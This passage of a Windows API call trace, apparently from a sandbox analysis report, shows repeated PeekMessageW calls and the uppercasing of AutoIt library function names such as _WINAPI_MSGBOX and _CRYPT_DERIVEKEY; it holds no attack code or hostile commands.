| out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.073] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.074] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.075] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.076] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.098] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.099] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_BEEP", cchLength=0xc | out: lpsz="_WINAPI_BEEP") returned 0xc [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_FORMATMESSAGE", cchLength=0x15 | out: lpsz="_WINAPI_FORMATMESSAGE") returned 0x15 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_GETERRORMESSAGE", cchLength=0x17 | out: lpsz="_WINAPI_GETERRORMESSAGE") returned 0x17 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_GETLASTERROR", cchLength=0x14 | out: lpsz="_WINAPI_GETLASTERROR") returned 0x14 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_GETLASTERRORMESSAGE", cchLength=0x1b | out: lpsz="_WINAPI_GETLASTERRORMESSAGE") returned 0x1b [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_MESSAGEBEEP", cchLength=0x13 | out: lpsz="_WINAPI_MESSAGEBEEP") returned 0x13 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_MSGBOX", cchLength=0xe | out: lpsz="_WINAPI_MSGBOX") returned 0xe [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_SETLASTERROR", cchLength=0x14 | out: lpsz="_WINAPI_SETLASTERROR") returned 0x14 [0073.100] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.100] CharUpperBuffW (in: lpsz="_WINAPI_SHOWERROR", cchLength=0x11 | out: lpsz="_WINAPI_SHOWERROR") returned 0x11 [0073.101] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.101] CharUpperBuffW (in: lpsz="_WINAPI_SHOWLASTERROR", cchLength=0x15 | out: lpsz="_WINAPI_SHOWLASTERROR") returned 0x15 [0073.101] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.104] CharUpperBuffW (in: lpsz="_WINAPI_SHOWMSG", cchLength=0xf | out: lpsz="_WINAPI_SHOWMSG") returned 0xf [0073.104] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.104] CharUpperBuffW (in: lpsz="__COMERRORFORMATING", cchLength=0x13 | out: lpsz="__COMERRORFORMATING") returned 0x13 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.105] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 